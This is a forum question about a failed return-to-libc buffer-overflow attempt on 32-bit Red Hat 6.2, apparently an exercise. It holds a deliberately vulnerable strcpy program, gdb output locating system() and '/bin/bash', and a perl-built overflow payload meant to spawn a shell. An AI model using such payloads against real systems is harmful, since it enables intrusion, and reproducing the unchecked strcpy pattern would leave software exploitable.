# I want to try a return-to-libc attack

Tags: bash, system, redhat

The program I want to attack is the following:

```
int main(int argc, char *argv[])
{
char buffer[256];
if(argc < 2){
    printf("argv error\n");
    exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
```

It is in redhat 6.2, so I didn't think there was anything to consider.
So I tried this:

```
(gdb) b main
Breakpoint 1 at 0x8048439
(gdb) r
Starting program: /home/asdf/asdfghj 
Breakpoint 1, 0x8048439 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) x/s 0xbfffff8e
0xbfffff8e:  "/bin/bash"
(gdb) q
```

So my payload looked like this, the first 260 bytes being the buffer+sfp, then the address of the system function, a 4 byte dummy, and the address of the argument, "/bin/bash".

```
./asdfghj `perl -e 'print "\x90"x260, "\xe0\x8a\x05\x40", "AAAA", "\x8e\xff\xff\xbf"'`
```

However this still gives me only a segmentation fault. I have no idea how to fix this, and the addresses come from the dumped core of the program which I set a breakpoint, ran it, then got the addresses.

What should I check to successfully attack the program and what do you think is the problem?  Is it that I use /bin/bash, or any of the addresses incorrect?

Plus, I've already set bash2 for default.

Thanks. :)

Comment: What is your redhat version? and is it 32-bits/

Comment: @MortezaLSC It is redhat 6.2, and I'm pretty sure it is 32 bits

Comment: I saw such problems for myself...this is my question as well///I think the version of redhat doesn't support such vulnerabilities :)

Comment: @MortezaLSC Hmm.. But I've seen someone else attack it and get the shell. Thanks tho :)